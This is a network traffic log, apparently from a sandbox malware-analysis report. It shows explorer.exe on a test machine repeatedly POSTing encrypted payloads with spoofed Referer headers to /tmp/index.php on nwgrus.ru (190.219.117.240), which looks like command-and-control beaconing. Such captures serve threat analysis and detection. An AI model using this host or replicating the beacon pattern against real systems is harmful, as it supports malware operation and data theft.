Oct 3, 2024 02:52:26.191916943 CEST	202	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 79 2e a0 e9 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuy.\=}^=aP!y>1;bj-(_HI EL-8Xy-sMV%eU%
Oct 3, 2024 02:52:27.275322914 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:27 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:27.290863037 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sahyhdmmcvpatde.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: nwgrus.ru
Oct 3, 2024 02:52:27.290905952 CEST	180	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2e 36 e6 a0 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu.6ODkD3jDW-\|26J0f6HaH0$v#y*v,q_J'K
Oct 3, 2024 02:52:28.385185003 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:28.399614096 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iqjnmccnpjtfli.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: nwgrus.ru
Oct 3, 2024 02:52:28.399646044 CEST	255	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6c 2a d5 90 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vul*o1\yHF0dcw;eRWV[WwX ~#RjU\0NV)fx==8&Mtu<ao ZY
Oct 3, 2024 02:52:30.168534994 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:29 GMT Content-Type: text/html; charset=utf-8 Connection: close
Oct 3, 2024 02:52:30.168641090 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:29 GMT Content-Type: text/html; charset=utf-8 Connection: close
Oct 3, 2024 02:52:30.168668985 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:29 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:30.176407099 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jkxskklaphmdca.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 132 Host: nwgrus.ru
Oct 3, 2024 02:52:30.176431894 CEST	132	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2a 32 aa ec Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu*2POcDeoIS{![CI/kCx
Oct 3, 2024 02:52:31.280688047 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:31 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:31.293728113 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gmrribpoppj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: nwgrus.ru
Oct 3, 2024 02:52:31.293762922 CEST	238	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 29 26 d8 e4 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu)&JAQD5d{ZcX.l^V]>V'H<e8lN3#A+pg2-"[6cU/7SwjHn
Oct 3, 2024 02:52:32.371716976 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:32.385245085 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fvhbfgwwnuywwuoj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: nwgrus.ru
Oct 3, 2024 02:52:32.385245085 CEST	214	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 64 04 ac e7 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vudM00-?m(=:X~:['kHVHzCNB<SD{A&
Oct 3, 2024 02:52:33.463484049 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:33.475970984 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wcoutespihad.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: nwgrus.ru
Oct 3, 2024 02:52:33.475996971 CEST	326	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 56 a0 a5 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu*VDlu-mDYt4n0#iRS5LM6,;$79VIZ6u@f)Q_(igsU_c~d9I}
Oct 3, 2024 02:52:34.564838886 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:34 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:34.603136063 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pmsjsfqrqyrxj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 219 Host: nwgrus.ru
Oct 3, 2024 02:52:34.603157997 CEST	219	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4c 0d a6 a9 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuLZ{`j1rp0V+qnaOg_9USG4P!R\|kLnEi)T5c) U@b+n\|
Oct 3, 2024 02:52:35.755268097 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:35.808037996 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://etwlmvbptmw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: nwgrus.ru
Oct 3, 2024 02:52:35.808073997 CEST	192	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 62 2d ef 9d Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vub-]hJ,k;\|o+D8vc-no_!%iSC1ce*T8
Oct 3, 2024 02:52:36.896193981 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:36.914623976 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hytemqketckrb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: nwgrus.ru
Oct 3, 2024 02:52:36.914649010 CEST	114	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 62 53 d0 ed Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vubSEEbu9y@Hm=
Oct 3, 2024 02:52:38.024081945 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:38.037350893 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mgmthbbcemjcwdac.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 315 Host: nwgrus.ru
Oct 3, 2024 02:52:38.037350893 CEST	315	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2c 52 cc 83 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu,RzBn_dHp/=+iF1gEP<KX8JKGto597(p#.hT^Leltk&+MqeUeQ]g
Oct 3, 2024 02:52:39.123039961 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:39.136965990 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mclmeggoidfw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: nwgrus.ru
Oct 3, 2024 02:52:39.136965990 CEST	220	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 54 2b cc a3 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuT+Y]\|uKy5M-tso {7yf";!@D'Vhs?4 jM8 s)"VF/@6~&
